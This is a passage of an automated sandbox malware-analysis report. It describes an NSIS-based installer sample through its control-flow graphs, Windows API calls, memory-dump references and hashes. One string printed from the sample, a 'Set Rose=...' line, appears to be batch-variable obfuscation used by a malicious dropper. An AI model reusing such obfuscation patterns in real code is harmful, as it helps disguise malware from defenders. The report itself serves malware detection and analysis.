                                                                                                                                                                                                                                                                                                    control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,0042777E,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Set Rose=HwAlxFaces-Joke-Experiencing-Supply-S-qOwSample-Lopez-DcVpn-Fx-Hunt-Reg-enBrands-Younger-Benefits-Statistical-dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-RoPressure-Set Instrumentation=wRrQCNick-Vampire-Longer-ynaOpponents, xrefs: 004033FD
                                                                                                                                                                                                                                                                                                    • ... %d%%, xrefs: 004034C8
                                                                                                                                                                                                                                                                                                    • ~wB, xrefs: 0040346F, 0040348A, 00403513
                                                                                                                                                                                                                                                                                                    • pAB, xrefs: 004033AB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ... %d%%$Set Rose=HwAlxFaces-Joke-Experiencing-Supply-S-qOwSample-Lopez-DcVpn-Fx-Hunt-Reg-enBrands-Younger-Benefits-Statistical-dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-RoPressure-Set Instrumentation=wRrQCNick-Vampire-Longer-ynaOpponents$pAB$~wB
                                                                                                                                                                                                                                                                                                    • API String ID: 651206458-2514275283
                                                                                                                                                                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                                    Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                                                    • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                    • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                    Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                    Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
